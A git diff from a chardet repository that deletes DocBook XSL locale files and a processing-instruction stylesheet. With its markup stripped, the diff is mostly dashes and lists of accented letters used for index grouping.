- ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/nl.xml b/chardet/docs/docbook/xsl/common/nl.xml deleted file mode 100644 index fe90cd5..0000000 --- a/chardet/docs/docbook/xsl/common/nl.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/nn.xml b/chardet/docs/docbook/xsl/common/nn.xml deleted file mode 100644 index 48bcbd5..0000000 --- a/chardet/docs/docbook/xsl/common/nn.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/no.xml b/chardet/docs/docbook/xsl/common/no.xml deleted file mode 100644 index ee5d634..0000000 --- a/chardet/docs/docbook/xsl/common/no.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/pi.xsl b/chardet/docs/docbook/xsl/common/pi.xsl deleted file mode 100644 index caa4c09..0000000 --- a/chardet/docs/docbook/xsl/common/pi.xsl +++ /dev/null @@ -1,177 +0,0 @@ - - - - - - - - - - - - - - - - format - - - - - - - - - - - - - - - - - - - - padding - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - Timestamp processing requires XSLT processor with EXSLT date support. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - 0 - - - - - - - 0 - - - - 0 - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/pl.xml b/chardet/docs/docbook/xsl/common/pl.xml deleted file mode 100644 index d7dd176..0000000 --- a/chardet/docs/docbook/xsl/common/pl.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/pt.xml b/chardet/docs/docbook/xsl/common/pt.xml deleted file mode 100644 index f708b2c..0000000 --- a/chardet/docs/docbook/xsl/common/pt.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/pt_br.xml b/chardet/docs/docbook/xsl/common/pt_br.xml deleted file mode 100644 index 06ce869..0000000 --- a/chardet/docs/docbook/xsl/common/pt_br.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - 